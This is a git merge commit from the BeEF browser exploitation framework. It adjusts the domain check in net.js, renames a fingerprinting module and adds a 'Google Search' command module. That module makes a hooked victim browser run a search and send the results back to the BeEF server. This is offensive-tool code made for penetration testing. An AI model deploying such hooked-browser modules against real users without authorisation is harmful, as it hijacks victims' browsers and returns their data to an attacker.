Merge branch 'master' of github.com:beefproject/beef

2012-05-03 18:43:57 +10:00
parent 335adbdc15 99d47351b7
commit c61aae0949
5 changed files with 101 additions and 5 deletions
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -146,7 +146,7 @@ beef.net = {
    request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
        //check if same domain or cross domain
        var cross_domain = true;
-        if (document.domain == domain){
+		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
            if(document.location.port == "" || document.location.port == null){
                cross_domain = !(port == "80" || port == "443");
            }
@@ -243,9 +243,9 @@ beef.net = {

        // check if same domain or cross domain
        var cross_domain = true;
-        if (document.domain == domain) {
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
           if(document.location.port == "" || document.location.port == null){
-              cross_domain = !(port == "80" || port == "443");
+               cross_domain = !(port == "80" || port == "443");
           } else {
              if (document.location.port == port) cross_domain = false;
           }
--- a/modules/browser/google_search/command.js
+++ b/modules/browser/google_search/command.js
@@ -0,0 +1,39 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var query = '<%= @query.gsub(/'/, "\\'") %>';
+
+	var searchGoogle = function(query) {
+
+		var script = document.createElement('script');
+		script.defer = true;
+		script.type = "text/javascript";
+		script.src = "https://ajax.googleapis.com/ajax/services/search/web?callback=callback&lstkp=0&rsz=large&hl=en&q=" + query + "&v=1.0";
+
+		callback = function (results) {
+			document.body.removeChild(script);
+			delete callback;
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, "query="+query+"&results="+JSON.stringify(results));
+		};
+
+		document.body.appendChild(script);
+	}
+
+	searchGoogle(query);
+
+});
+
--- a/modules/browser/google_search/config.yaml
+++ b/modules/browser/google_search/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        google_search:
+            enable: true
+            category: "Browser"
+            name: "Google Search"
+            description: "This module uses the hooked browser to search Google."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
--- a/modules/browser/google_search/module.rb
+++ b/modules/browser/google_search/module.rb
@@ -0,0 +1,32 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Google_search < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'query', 'ui_label' => 'Query', 'type' => 'textarea', 'value' =>'beef', 'width' => '400px', 'height' => '50px'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['results'] = @datastore['results']
+		content['query'] = @datastore['query']
+		save content
+	end
+
+end
+
--- a/modules/hooked_domain/ajax_fingerprint/config.yaml
+++ b/modules/hooked_domain/ajax_fingerprint/config.yaml
@@ -17,8 +17,8 @@ beef:
    module:
        ajax_fingerprint:
            enable: true
-            category: "Host"
-            name: "Hooked Domain"
+            category: "Hooked Domain"
+            name: "Fingerprint Ajax"
            description: "Fingerprint Ajax and JS libraries present on the hooked page."
            authors: ["qswain"]
            target: